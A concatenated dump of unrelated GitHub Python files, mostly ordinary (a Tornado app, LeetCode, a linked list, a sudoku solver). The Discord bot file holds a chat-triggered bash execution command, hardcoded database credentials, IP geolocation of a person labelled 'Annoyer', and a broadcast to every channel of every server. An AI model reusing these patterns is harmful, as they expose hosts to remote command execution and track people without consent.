{"seq_id":"37567584562","text":"import tornado.ioloop\nimport tornado.web\nfrom controller import ResultsHandler, ResultadosAgrupadosHandler, MaiorIncidenciaHandler, \\\n    VideoHandler, RodoviaHandler\nimport os\n\n# get the current directory of the app.py file\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\n\n# get the absolute path to the data directory inside the container\ndata_dir = os.path.join(current_dir, 'data')\ndef make_app():\n    # get the absolute path to the labtrans.db file inside the data directory\n    db_path = os.path.join(data_dir, 'labtrans.db')\n    app = tornado.web.Application([\n        (r\"/results\", ResultsHandler),\n        (\"/resultados_agrupados\", ResultadosAgrupadosHandler),\n        (r\"/maior-incidencia/([^/]+)\", MaiorIncidenciaHandler),\n        (r\"/videos\", VideoHandler),\n        (r\"/rodovias\", RodoviaHandler),\n    ])\n\n    app.settings['debug'] = True\n    # set the labtrans.db file path on the Application object\n    app.settings['db_path'] = db_path\n    return app\n\n\nif __name__ == \"__main__\":\n    app = make_app()\n    app.listen(8888)\n    tornado.ioloop.IOLoop.current().start()","repo_name":"medeiroslucass/labtrans-challenger","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"9786068804","text":"#53. 
Maximum Subarray\nfrom typing import List\n\nimport numpy as np\n\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n if len(nums) == 1:\n return nums[0]\n sum = nums[0]\n dp = np.zeros(len(nums), dtype=int)\n dp[0] = nums[0]\n for i in range(1, len(nums)):\n if dp[i-1] + nums[i] > nums[i]:\n dp[i] = dp[i - 1] + nums[i]\n else:\n dp[i] = nums[i]\n sum = dp[i] if dp[i] > sum else sum\n\n return sum\n\ns = Solution\nnums = [-2,1,-3,4,-1,2,1,-5,4]\nnums = [-1, -2]\n# nums = [1, 2]\nprint(s.maxSubArray(s, nums))\nexit(0)\n","repo_name":"nightsnack/leetcode","sub_path":"Python/q53.py","file_name":"q53.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"39949009371","text":"\"\"\"\nlinkedlist.py\n\nA Linked List interface and implementation in Python\nThis version uses a cursor. Using indices is inherently inefficient and\nhides the strengths of the linked list.\nCursors, immutable, are created by list methods.\n\nauthor: James Heliotis\nRohit Ravishankar (rr9105@rit.edu)\nParinitha Nagaraja (pn4972@rit.edu)\n\"\"\"\n\nclass DNAList:\n\n __slots__ = '__front', '__back', 'gene'\n\n def __init__( self, gene='' ):\n \"\"\" Create an empty list.\n \"\"\"\n self.__back = None\n self.__front = None\n\n next = self.__front\n if len(gene) > 1:\n for i in range(len(gene)):\n newNode = LinkedNode(gene[i])\n if i == 0:\n self.__front = newNode\n next = self.__front\n else:\n next.link = newNode\n next = next.link\n if i is (len(gene) - 1):\n self.__back = newNode\n\n else:\n self.gene = gene\n\n def append( self, item ):\n \"\"\" Add value to the end of the list.\n List is modified.\n :param new_value: the value to add\n :return: None\n \"\"\"\n newNode = LinkedNode( item )\n if self.__front == None and self.__back == None:\n self.__front = newNode\n else:\n self.__back.link = newNode\n self.__back = newNode\n\n def copy(self):\n \"\"\"\n Create a copy of the list\n :return: None\n \"\"\"\n newList = DNAList()\n old = self.__front\n\n while old != None:\n newList.append(old.value)\n old = old.link\n return newList\n\n\n def __str__(self):\n \"\"\" Print the contents of a list on a single line, first to last.\n \"\"\"\n result = \"\"\n node = DNAList()\n node.__front = self.__front\n if node.__front != None:\n result += str(node.__front.value)\n node.__front = node.__front.link\n while node.__front:\n result += \" \" + str(node.__front.value)\n node.__front = node.__front.link\n return result\n\n def snip(self, i1, i2):\n \"\"\"\n Removes a portion of the gene from index i1 to i2\n :param i1: starting index (inclusive)\n :param i2: ending index (exclusive)\n :return: None\n \"\"\"\n cursor = self.__front\n\n previousPointer = self.__front\n subStringBeginning = self.__front\n nextPointer = self.__front\n\n counter = 0\n\n while cursor != None:\n if counter <= (i1 - 2):\n previousPointer = previousPointer.link\n if counter <= (i1 - 1):\n subStringBeginning = subStringBeginning.link\n if counter <= (i2 - 1):\n nextPointer = nextPointer.link\n\n cursor = cursor.link\n counter += 1\n\n if subStringBeginning.value == previousPointer.value :\n self.__front = nextPointer\n else:\n previousPointer.link = nextPointer\n return self\n\n def join(self, other):\n \"\"\"\n :param other:\n :return:\n \"\"\"\n self.__back.link = other.__front\n self.__back = other.__back\n\n\n def replace(self, repstr, other):\n\n headPointer = LinkedNode(None, self.__front)\n cursor = headPointer\n cursor1 = 
headPointer\n stringBeginningPointer = headPointer\n\n\n # To traverse the string that needs to be replaced\n counter = 0\n\n while cursor != None:\n if cursor1.link.value == repstr[counter]:\n stringBeginningPointer = cursor1\n elif cursor1.value != repstr[counter]:\n pass\n else:\n pass\n while counter < len(repstr):\n if cursor1 == None:\n return self\n elif cursor1.value == repstr[counter]:\n cursor1 = cursor1.link\n counter += 1\n else:\n break\n if counter == len(repstr):\n if stringBeginningPointer.link == self.__front:\n self.__front = other.__front\n else:\n stringBeginningPointer.link = other.__front\n other.__back.link = cursor1\n break\n\n counter = 0\n if cursor1.link != None:\n cursor1 = cursor1.link\n cursor = cursor.link\n return self\n\n\n def splice(self, ind, other):\n\n index = 0\n\n cursor = self.__front\n previousPointer = self.__front\n nextPointer = self.__front\n\n if ind == 0:\n\n # If the index is = 0 splice list at the beginning\n previousPointer = other.__front\n other.__back.link = self.__front\n self.__front = previousPointer\n else:\n while cursor != None:\n\n # For the case where the list isn't being spliced at the end\n if index == ind and cursor.link != None:\n cursor = cursor.link\n nextPointer = previousPointer.link\n previousPointer.link = other.__front\n other.__back.link = nextPointer\n\n # For the case where the list is being spliced at the end\n elif index == ind and cursor.link == None:\n cursor.link = other.__front\n self.__back = other.__back\n break\n\n else:\n previousPointer = previousPointer.link\n cursor = cursor.link\n index += 1\n cursor = self.__front\n return self\n\n\"\"\"\nnode.py\nauthor: James heliotis\ndescription: A linkable node class for use in stacks, queues, and linked lists\n\"\"\"\n\nclass LinkedNode:\n\n __slots__ = \"value\", \"link\"\n\n def __init__( self, value, link = None ):\n \"\"\" Create a new node and optionally link it to an existing one.\n param value: the value to be stored in the new node\n param link: the node linked to this one\n \"\"\"\n self.value = value\n self.link = link\n\n def __str__( self ):\n \"\"\" Return a string representation of the contents of\n this node. 
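A doctest-style sketch (the sample values are illustrative, assuming the class as defined here):\n\n               >>> str(LinkedNode('A', LinkedNode('C')))\n               'A'\n\n           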
The link is not included.\n \"\"\"\n return str( self.value )\n\n def __repr__( self ):\n \"\"\" Return a string that, if evaluated, would recreate\n this node and the node to which it is linked.\n This function should not be called for a circular\n list.\n \"\"\"\n return \"LinkedNode(\" + repr( self.value ) + \",\" + \\\n repr( self.link ) + \")\"\n\n","repo_name":"rohitravishankar/Year-1","sub_path":"CSCI-603/Lab6/dnalist.py","file_name":"dnalist.py","file_ext":"py","file_size_in_byte":6752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"42012863369","text":"'''\nCreated on Oct 10, 2015\n\n@author: Sameer Adhikari\n'''\nfrom pprint import PrettyPrinter\n\n# Example illustrating mixing keys in a dictionary\n# The keys can be any hashable type\n\nrandkeys = {}\nrandkeys['astring'] = 'a string'\nrandkeys[7] = 'an integer'\nrandkeys[5.7] = 'a float'\nrandkeys[('astring', 7)] = 'a tuple'\n\nclass AnObject(object):\n def __init__(self, avalue):\n self.avalue = avalue\n\nanobject = AnObject(13) \nrandkeys[anobject] = 'an object'\nanobject.avalue = 11\n\nalist = [1, 2, 3]\nadict = {'a': 1}\n\ntry:\n randkeys[alist] = 'a list'\nexcept: \n print('Unable to use a list as a key')\n\ntry:\n randkeys[adict] = 'a dict'\nexcept: \n print('Unable to use a dict as a key')\n\npp = PrettyPrinter(indent=4)\npp.pprint(randkeys)","repo_name":"tri2sing/PyOO","sub_path":"misc/randomkeys.py","file_name":"randomkeys.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41769848769","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nimport time\nimport datetime\nfrom time import sleep\nimport sys\nimport random\nimport traceback\nimport argparse\nimport sqlite3\nimport urllib.request\nimport bs4\nimport html\nimport twilio\nfrom twilio.rest import Client\nimport pyfiglet\nimport re\nimport pdb\nimport json\nimport atexit\nimport dweepy\nimport asyncpg\nimport os\nimport aiohttp\nimport subprocess\nimport copy\n\nasync def get_prefixes(bot,msg):\n if msg.guild == None:\n prefixes = [\"c!\"]\n else:\n try:\n data = await bot.db.fetchrow(\"SELECT * FROM prefixes WHERE guild_id=$1\",msg.guild.id)\n except AttributeError:\n data = None\n if data == None:\n prefixes = [\"c!\"]\n else:\n prefixes = data[\"prefix\"]\n prefixes = prefixes.split(\",\")\n to_pop = len(prefixes) - 1\n prefixes.pop(to_pop)\n return commands.when_mentioned_or(*prefixes)(bot,msg)\n\n\nprint(discord.__version__)\nbot = commands.Bot(command_prefix= get_prefixes)\n\nasync def set_up_token():\n credentials = {\"user\": \"zachary\", \"password\": \"capn\", \"database\": \"capnbot\", \"host\": \"127.0.0.1\"}\n db = await asyncpg.create_pool(**credentials) \n data = await db.fetchrow(\"SELECT * FROM keys;\")\n global TOKEN\n TOKEN = data[\"test_token\"]\n TOKEN = data[\"real_token\"]\n\n\nbot.blacklist= []\nbot.launch_time = time.time()\nbot.counter = 0\ntry:\n dweep = dweepy.get_latest_dweet_for('CapnBot')[0]\n dweet = dweep['content']\n bot.webmessage = dweet['msg']\nexcept:\n bot.webmessage = \"\"\n\n\n @bot.command(aliases=[\"bash\", \"shell\", \"sh\", \"console\"])\n async def cmd(ctx, *, code):\n if not ctx.author.id == 422181415598161921:\n return\n def runshell(code):\n with subprocess.Popen([\"/bin/bash\", \"-c\", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as process:\n out, err = process.communicate(timeout=60)\n if err:\n return 
[f\"```fix\\n{code}``` ```fix\\n-- stdout --\\n\\n{out.decode()}``` ```fix\\n-- stderr --\\n\\n{err.decode()}```\", out.decode(), err.decode()]\n else:\n return [f\"```fix\\n{code}``` ```fix\\n-- stdout --\\n\\n{out.decode()}```\", out.decode(), err.decode()]\n result = await bot.loop.run_in_executor(None, runshell, code)\n try:\n await ctx.send(result[0])\n except Exception:\n await ctx.send(f\"**:arrow_up: | Looks like output is too long. Attempting upload to Mystbin.**\")\n try:\n async with aiohttp.ClientSession().post(\"http://mystb.in/documents\", data=f\"{result[1]}\\n\\n\\n\\n{result[2]}\".encode('utf-8')) as post:\n post = await post.json()\n await ctx.send(f\"**:white_check_mark: | http://mystb.in/{post['key']}**\")\n except Exception:\n await ctx.send(\"**:x: | Couldn't upload to Mystbin.**\") \n\n\n@bot.group(invoke_without_command=True)\n@commands.guild_only()\nasync def prefix(ctx, prefix):\n await ctx.send(\"Missing an argument(add, clear, or show).\")\n\n\n@prefix.command()\n@commands.guild_only()\nasync def add(ctx,prefix):\n '''Sets a new prefix for the guild'''\n if not ((ctx.author.id == 422181415598161921) or (ctx.author.guild_permissions.administrator)):\n return await ctx.send(\"You don't have the permissions to use this command.\")\n data = await bot.db.fetchrow(\"SELECT * FROM prefixes WHERE guild_id=$1\",ctx.guild.id)\n new_prefix = prefix + \",\"\n if data == None:\n await bot.db.execute(\"INSERT INTO prefixes VALUES ($1,$2);\", ctx.guild.id, prefix)\n else:\n prefixes = data[\"prefix\"]\n new_prefix = prefixes + new_prefix\n await bot.db.execute(\"UPDATE prefixes SET prefix=$1 WHERE guild_id=$2;\", new_prefix, ctx.guild.id)\n await ctx.send(f\"The Prefix {prefix} can now be used to call commands.\")\n\n@prefix.command()\n@commands.guild_only()\nasync def clear(ctx):\n '''Clears all prefixes from the guild'''\n if not ctx.author.id == 422181415598161921:\n return await ctx.send(\"Not Enough Perms\")\n await bot.db.execute('UPDATE prefixes SET prefix=$1 WHERE guild_id=$2;', 'c!,', ctx.guild.id)\n await ctx.send(\"Prefixes cleared. 
The only prefix that can be used is c!\")\n\n@prefix.command()\n@commands.guild_only()\nasync def show(ctx):\n '''Shows prefixes for the guild'''\n data = await bot.db.fetchrow(\"SELECT * FROM prefixes WHERE guild_id=$1\",ctx.guild.id)\n if data == None:\n prefixes = [\"c!\"]\n else:\n prefix = data[\"prefix\"]\n prefixes = prefix.split(\",\")\n if len(prefixes) == 2:\n return await ctx.send(\"The prefix for this server is \" + prefixes[0])\n elif len(prefixes) == 3:\n return await ctx.send(\"The prefixes for this server are \" + prefixes[0] + \" and \" + prefixes[1])\n else:\n msg= \"\"\n i = 2\n for x in prefixes:\n if i == len(prefixes):\n msg = msg + \", and \" + x\n break\n elif i == 2:\n msg = x\n else:\n msg = msg + \", \" + x\n i+=1\n return await ctx.send(\"The prefixes for this server are \"+ msg)\n \n\n@bot.command()\nasync def ping(ctx):\n 'Pings Bot'\n channel = ctx.channel\n t1 = time.perf_counter()\n await channel.trigger_typing()\n t2 = time.perf_counter()\n latency = round(bot.latency *1000)\n t = round((t2-t1)*1000)\n green = discord.Color.green()\n desc=f\":heartbeat: **{latency}**ms \\n :stopwatch: **{t}**ms\"\n em = discord.Embed(title = \":ping_pong: Pong\",description = desc, color = green)\n em.set_footer(text=f\"Requested by {ctx.author.name}\",icon_url=ctx.author.avatar_url)\n await ctx.send(embed=em)\n \n\n@bot.command()\nasync def pong(ctx):\n 'Also Pings Bot'\n channel = ctx.channel\n t1 = time.perf_counter()\n await channel.trigger_typing()\n t2 = time.perf_counter()\n latency = round(bot.latency *1000)\n t = round((t2-t1)*1000)\n green = discord.Color.green()\n desc=f\":heartbeat: **{latency}**ms \\n :stopwatch: **{t}**ms\"\n em = discord.Embed(title = \":ping_pong: Ping?\",description = desc, color = green)\n em.set_footer(text=f\"Requested by {ctx.author.name}\",icon_url=ctx.author.avatar_url)\n await ctx.send(embed=em)\n\n\ndef get_channel(channel_name):\n for channel in bot.get_all_channels():\n if channel.name == channel_name:\n return channel\n return None\n\n\n@bot.command()\nasync def quit(ctx):\n '''Quits bot'''\n if ctx.author.id == 422181415598161921:\n await bot.close()\n else:\n await ctx.send('Permission Denied')\n\n@bot.command()\nasync def load(ctx, extension_name: str):\n 'Loads an extension.'\n if not ctx.author.id == 422181415598161921:\n return\n cog = \"cogs.\"+extension_name\n bot.load_extension(cog)\n await ctx.send('{} loaded.'.format(extension_name))\n\n@bot.command()\nasync def unload(ctx,cog):\n '''Unloads an Extension'''\n if not ctx.author.id == 422181415598161921:\n return\n cog = \"cogs.\"+cog\n bot.unload_extension(cog)\n await ctx.message.add_reaction(\"\\U00002705\")\n \n@bot.command()\nasync def reload(ctx,*,cog):\n '''Reloads an Extension'''\n if not ctx.author.id == 422181415598161921:\n return\n if cog == \"all\":\n for cogs in bot.cogs:\n bot.unload_extension(cogs)\n bot.load_extension(cogs)\n await ctx.message.add_reaction(\"\\U00002705\")\n return\n cog = \"cogs.\"+cog\n bot.unload_extension(cog)\n bot.load_extension(cog)\n await ctx.message.add_reaction(\"\\U00002705\")\n\n@bot.command()\nasync def notifyall(ctx, *, args):\n '''Sends a Message in All Servers'''\n if not ctx.author.id == 422181415598161921:\n return\n for guild in bot.guilds:\n for channel in guild.channels:\n if isinstance(channel, discord.TextChannel):\n await channel.send(args)\n\n@commands.command()\nasync def upvote(self,ctx):\n '''Sends a link to upvote my bot'''\n await ctx.send(\"https://discordbots.org/bot/448915931507458048\")\n\n\nasync def 
_get_owner():\n bot.owner = (await bot.application_info()).owner\n\n@bot.event\n@asyncio.coroutine\nasync def on_ready():\n await _get_owner()\n extensions = [\"fun\",\"duel\",\"Roles\",\"misc\",\"regular\",\"games\",\"internet\",\"Working Music\", \\\n \"Error Handling\",\"calculation\",\"chatbot\",\"fortnite\", \"bot\", \"twitter\", \"twitch\", \"tags\", \\\n \"images\", \"star\"]\n for extension in extensions:\n bot.load_extension(\"cogs.\"+extension)\n bot.load_extension('jishaku')\n credentials = {\"user\": \"zachary\", \"password\": \"capn\", \"database\": \"capnbot\", \"host\": \"127.0.0.1\"}\n bot.db = await asyncpg.create_pool(**credentials)\n data = await bot.db.fetchrow(\"SELECT user_id FROM users WHERE blacklisted=true;\")\n try:\n for user in data:\n bot.blacklist.append(user)\n except:\n pass\n data = await bot.db.fetch(\"SELECT command_name from commands;\")\n commands = []\n for command in data:\n commands.append(command[\"command_name\"])\n for command in bot.commands:\n if command.qualified_name not in commands:\n await bot.db.execute(\"INSERT INTO commands VALUES($1,0);\",command.qualified_name)\n await bot.change_presence(activity=discord.Game(name=\"c!help\")) \n print('------')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n@bot.event\nasync def on_message_edit(before,after):\n if not after.author.id in bot.blacklist:\n await bot.process_commands(after)\n \n@bot.event\nasync def on_message(message):\n if (message.author.bot):\n return\n if not message.guild:\n return await bot.process_commands(message)\n if message.author.id in bot.blacklist:\n return\n if message.content.endswith(\"?\"):\n prefixes = await get_prefixes(bot, message)\n prefix = prefixes[0]\n message.content = prefix + message.content[:-1]\n await bot.process_commands(message)\n\n@bot.event\nasync def on_command(ctx):\n name = ctx.command.qualified_name\n if \" \" in name:\n msg = \"\"\n for char in name:\n if char != \" \":\n msg = msg+char\n else:\n name=msg\n break\n data = await bot.db.fetchrow(\"SELECT * FROM commands WHERE command_name = $1;\",name)\n uses = int(data[\"uses\"])\n uses+=1\n await bot.db.execute(\"UPDATE commands SET uses=$1 WHERE command_name=$2;\",uses,name)\n bot.counter += 1\n\n\n@bot.event\nasync def on_member_join(member):\n data = await bot.db.fetchrow('SELECT * FROM tracked_channels WHERE guild_id = $1;', member.guild.id)\n if data:\n channel = member.guild.get_channel(data['channel_id'])\n try:\n await channel.edit(name=\"User Count: \"+str(len(member.guild.members)))\n except discord.errors.Forbidden:\n pass\n\n@bot.event\nasync def on_member_remove(member):\n data = await bot.db.fetchrow('SELECT * FROM tracked_channels WHERE guild_id = $1;', member.guild.id)\n if data:\n channel = member.guild.get_channel(data['channel_id'])\n try:\n await channel.edit(name=\"User Count: \"+str(len(member.guild.members)))\n except discord.errors.Forbidden:\n pass\n\nasync def update_guild_count():\n await bot.wait_until_ready()\n await asyncio.sleep(10)\n while not bot.is_closed():\n data = await bot.db.fetchrow(\"SELECT * FROM keys;\")\n key = data[\"dbl_key\"]\n auth = {\"Authorization\": key}\n server_count = {\"server_count\":len(bot.guilds)}\n async with aiohttp.ClientSession(headers=auth) as session:\n await session.post(f\"https://discordbots.org/api/bots/{bot.user.id}/stats\", data=server_count)\n await asyncio.sleep(86400)\n\nasync def webserver():\n await bot.wait_until_ready()\n while not bot.is_closed():\n try:\n dweep = 
dweepy.get_latest_dweet_for('CapnBot')[0]\n dweet = dweep['content']\n message = dweet['msg']\n if message != bot.webmessage:\n user = await bot.get_user_info(422181415598161921)\n await user.send(message)\n bot.webmessage = message\n dweep = dweepy.get_latest_dweet_for('CapnBotIP')[0]\n dweet = dweep['content']\n ip = dweet['msg']\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://ip-api.com/json/\"+ip) as resp:\n data = await resp.json()\n country = data.get(\"country\")\n region = data.get(\"regionName\")\n city = data.get(\"city\")\n zipcode = data.get(\"zip\")\n isp = data.get(\"isp\")\n lat = data.get(\"lat\")\n lon = data.get(\"lon\")\n yellow = discord.Color.gold()\n em = discord.Embed(title=\"Annoyer Data\",description=ip,color=yellow)\n em.add_field(name=\"Country\",value=country)\n em.add_field(name=\"City\",value=f\"{city}, {region}\")\n em.add_field(name=\"Zipcode\",value=str(zipcode))\n em.add_field(name=\"ISP\",value=isp)\n em.add_field(name=\"Latitude\",value=str(lat))\n em.add_field(name=\"Longitude\",value=str(lon))\n await user.send(embed=em)\n except :\n pass\n await asyncio.sleep(60)\n\n\nbot.loop.run_until_complete(set_up_token())\nbot.loop.create_task(webserver())\nbot.loop.create_task(update_guild_count())\nbot.run(TOKEN)\n","repo_name":"CapnS/CapnBot","sub_path":"CapnBot.py","file_name":"CapnBot.py","file_ext":"py","file_size_in_byte":13654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41303859994","text":"\nclass Grid:\n \"\"\"Encapsulates a grid of squares, each containing \n possible values, and methods to solve the sudoku\"\"\"\n \n #----------------------------------------------------------------------------\n def __init__(self, param):\n \"\"\"If param is another grid this creates a copy, otherwise \n creates a new grid with the given sector dimension \n and with all squares containing all possible values\"\"\"\n \n from . 
square import Square\n \n if type(param) is type(self):\n \n self._sectorDimension = param._sectorDimension\n \n self._gridDimension = param._gridDimension\n \n self._rows = [[Square(sqr) for sqr in row]\n for row in param._rows]\n else:\n \n if param < 1:\n \n raise ValueError( \"Cannot create a grid with\"\n + \" a sector dimension of %s\"\n % param)\n \n self._sectorDimension = param\n \n self._gridDimension = param ** 2\n \n self._rows = [[Square(self._gridDimension)\n for rowIndex in range(self._gridDimension)]\n for colIndex in range(self._gridDimension)]\n \n #----------------------------------------------------------------------------\n def setSquareValue(self, colIndex, rowIndex, value):\n \"\"\"Sets the square in the given location to contain \n the given value as its only possibility\"\"\"\n \n if not ( 0 <= colIndex < self._gridDimension\n and 0 <= rowIndex < self._gridDimension):\n \n raise ValueError(\"Cannot index a grid of dimension %s with (%s, %s)\"\n % (self._gridDimension, colIndex, rowIndex))\n \n self._rows[rowIndex][colIndex].setValue(value)\n \n self._removeRelatedPossibilities(colIndex, rowIndex, value)\n \n #----------------------------------------------------------------------------\n def isPossible(self):\n \"\"\"Returns True if every square still \n has at least one possible value\"\"\"\n \n return all([square.isPossible() for row in self._rows\n for square in row])\n \n #----------------------------------------------------------------------------\n def isComplete(self):\n \"\"\"Returns True if every square has only \n a single value, when a grid is complete \n it has to be a valid sudoku\"\"\"\n \n return all([square.getValue() for row in self._rows\n for square in row])\n \n #----------------------------------------------------------------------------\n def refine(self):\n \"\"\"Applies further rules to the \n grid to deduce squares values\"\"\"\n \n targetIndexes = None\n \n colIndex, rowIndex = 0, 0\n \n while (colIndex, rowIndex) != targetIndexes:\n \n deducedValue = self._deduceSquare(colIndex, rowIndex)\n \n if deducedValue:\n \n self.setSquareValue(colIndex, rowIndex, deducedValue)\n \n if not self.isPossible():\n \n break\n \n if not targetIndexes or deducedValue:\n \n targetIndexes = colIndex, rowIndex\n \n colIndex += 1\n \n if colIndex >= self._gridDimension:\n \n colIndex = 0\n \n rowIndex += 1\n \n if rowIndex >= self._gridDimension:\n \n rowIndex = 0\n \n #----------------------------------------------------------------------------\n def _deduceSquare(self, colIndex, rowIndex):\n \"\"\"Tries to apply rules to this square to \n deduce its value, returns the deduced value \n or None if no deduction could be made\"\"\"\n \n square = self._rows[rowIndex][colIndex]\n \n if not square.isPossible() or square.getValue():\n \n return None\n \n for possibility in square.getPossibilities():\n \n if ( self._mustBeValueByRow (square, rowIndex, possibility)\n or self._mustBeValueByCol (colIndex, rowIndex, possibility)\n or self._mustBeValueBySector(colIndex, rowIndex, possibility)):\n \n return possibility\n \n return None\n \n #----------------------------------------------------------------------------\n def _mustBeValueByRow(self, targetSqaure, rowIndex, possibility):\n \"\"\"Returns true if the given possibility \n must be the value for the given square\"\"\"\n \n return not any([square.hasPossibility(possibility)\n for square in self._rows[rowIndex]\n if square is not targetSqaure])\n \n 
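# A minimal usage sketch of the deduction these _mustBeValueBy* helpers\n    # serve via refine() -- the classic \"hidden single\" rule; the values\n    # below are illustrative:\n    #\n    #     grid = Grid(3)                # a standard 9x9 sudoku\n    #     grid.setSquareValue(0, 0, 5)  # pin the given clues ...\n    #     grid.refine()                 # ... then let the deductions fire\n    #\n    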
#----------------------------------------------------------------------------\n    def _mustBeValueByCol(self, colIndex, rowIndex, possibility):\n        \"\"\"Returns true if the given possibility \n           must be the value for the given square\"\"\"\n        \n        return not any([self._rows[index][colIndex].hasPossibility(possibility)\n                        for index in range(self._gridDimension)\n                        if index != rowIndex])\n    \n    #----------------------------------------------------------------------------\n    def _mustBeValueBySector(self, colIndex, rowIndex, possibility):\n        \"\"\"Returns true if the given possibility \n           must be the value for the given square\"\"\"\n        \n        return not any([self._rows[iterRows][iterCols].hasPossibility(possibility)\n                        for (iterCols, iterRows) in\n                        self._getSquaresInSector(colIndex, rowIndex)])\n    \n    #----------------------------------------------------------------------------\n    def split(self):\n        \"\"\"Chooses a square that has two or more possibilities\n           and returns a list containing new versions of this\n           grid each with the chosen square containing one of\n           those possibilities\"\"\"\n\n        def countPossibilities(indexes):\n            \n            colIndex, rowIndex = indexes\n            \n            return len(self._rows[rowIndex][colIndex].getPossibilities())\n        \n        indexes = [(colIndex, rowIndex)\n                   for rowIndex in range(self._gridDimension)\n                   for colIndex in range(self._gridDimension)\n                   if countPossibilities((colIndex, rowIndex)) > 1] \n        \n        if len(indexes) == 0:\n            \n            raise RuntimeError( \"Could not split grid as there \"\n                              + \"were no viable squares to split\")\n\n        colIndex, rowIndex = min(indexes, key = countPossibilities)\n        \n        gridCopies = [Grid(self) for count in\n                      range(countPossibilities((colIndex, rowIndex)))]\n\n        square = self._rows[rowIndex][colIndex]\n        \n        for index, possibility in enumerate(square.getPossibilities()):\n            \n            gridCopies[index].setSquareValue(colIndex, rowIndex, possibility)\n        \n        return gridCopies\n    \n    #----------------------------------------------------------------------------\n    def getGridString(self):\n        \"\"\"Returns a string that displays the grid's \n           state in a human-digestible 2D format\"\"\"\n        \n        maxValueLength = len(str(self._sectorDimension ** 2))\n        \n        sectorDivider = \"-\" * (maxValueLength + 2) * self._sectorDimension\n        \n        dividerLine = \"+\".join([sectorDivider] * self._sectorDimension)\n        \n        gridValues = [[str(square.getValue() or \".\").center(maxValueLength + 2)\n                       for square in row] for row in self._rows]\n        \n        dividerIndexes = range(self._gridDimension - self._sectorDimension,\n                               0, -self._sectorDimension)\n        \n        for row, index in [(row, index) for row in gridValues\n                           for index in dividerIndexes]:\n            row.insert(index, \"|\")\n        \n        rowValues = [\"\".join(row) for row in gridValues]\n        \n        for index in dividerIndexes:\n            \n            rowValues.insert(index, dividerLine)\n        \n        return \"\\n\".join(rowValues) \n    \n    #----------------------------------------------------------------------------\n    def getStateLine(self):\n        \"\"\"Returns a string where each character represents a square value. 
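A doctest-style sketch (illustrative; assumes getValue() stays None\n           until a square is decided):\n\n               >>> grid = Grid(2)\n               >>> grid.setSquareValue(0, 0, 1)\n               >>> grid.getStateLine()[:4]\n               '1...'\n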
\n           Squares are listed left to right, top to bottom and any squares \n           which don't have a value are shown represented as '.'\"\"\"\n        \n        if self._sectorDimension > 3:\n            \n            raise RuntimeError( \"Cannot create a state line for\"\n                              + \" a grid with a dimension of %s\"\n                              % self._sectorDimension)\n        \n        gridValues = [square.getValue() or \".\" for row in self._rows\n                      for square in row]\n\n        return \"\".join([str(value) for value in gridValues])\n    \n    #----------------------------------------------------------------------------\n    def _removeRelatedPossibilities(self, colIndex, rowIndex, possibility):\n        \"\"\"Removes the given possibility from related \n           squares but not from the given square itself\"\"\"\n        \n        # Remove the possibility from squares in the row\n        column = self._rows[rowIndex]\n        \n        for colIndexInRow in [index for index in range(self._gridDimension)\n                              if index != colIndex]:\n            \n            self._removePossibility(colIndexInRow, rowIndex, possibility)\n        \n        # Remove the possibility from squares in the column \n        for rowIndexInCol in [index for index in range(self._gridDimension)\n                              if index != rowIndex]:\n            \n            self._removePossibility(colIndex, rowIndexInCol, possibility)\n\n        sectorIndexes = self._getSquaresInSector(colIndex, rowIndex)\n\n        # Remove the possibility from squares in the sector\n        for sectorColIndex, sectorRowIndex in sectorIndexes:\n            \n            self._removePossibility(sectorColIndex, sectorRowIndex, possibility)\n    \n    #----------------------------------------------------------------------------\n    def _removePossibility(self, colIndex, rowIndex, possibility):\n        \"\"\"Removes a possibility from a square, if only \n           a single value remains for the square then \n           all related squares are also updated\"\"\"\n        \n        square = self._rows[rowIndex][colIndex]\n        \n        if square.removePossibility(possibility):\n            \n            value = square.getValue()\n            \n            if value:\n                \n                self._removeRelatedPossibilities(colIndex, rowIndex, value)\n    \n    #----------------------------------------------------------------------------\n    def _getSquaresInSector(self, colIndex, rowIndex):\n        \"\"\"Returns a list of tuples in the form (colIndex, rowIndex), \n           of all the squares in the same sector as the given \n           square but excluding the given square itself\"\"\"\n        \n        sectorRowIndex = int(rowIndex / self._sectorDimension)\n        sectorColIndex = int(colIndex / self._sectorDimension)\n\n        rowIndexes = list(range(self._sectorDimension * sectorRowIndex,\n                                self._sectorDimension * (sectorRowIndex + 1)))\n        \n        colIndexes = list(range(self._sectorDimension * sectorColIndex,\n                                self._sectorDimension * (sectorColIndex + 1)))\n        \n        return [(iterColIndex, iterRowIndex) for iterRowIndex in rowIndexes\n                for iterColIndex in colIndexes\n                if (iterColIndex, iterRowIndex) != (colIndex, rowIndex)]\n","repo_name":"matburton/sudoku_solver","sub_path":"python/sudoku/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":11836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"12724186491","text":"import os\n\nimport tensorflow as tf\nfrom tensorboard.plugins import projector\n\nfrom text_classification.model import BaseTextClassificationModel\n\n\nclass EmbeddingVisualizer:\n    \"\"\"\n    Static class for text embedding visualization.\n    \"\"\"\n    @staticmethod\n    def visualize_embeddings(model: BaseTextClassificationModel, log_dir: str, dataset: tf.data.Dataset):\n        data_text = [txt for txts, labels in dataset for txt in txts]\n        data_label = [label for txts, labels in dataset for label in labels]\n\n        with 
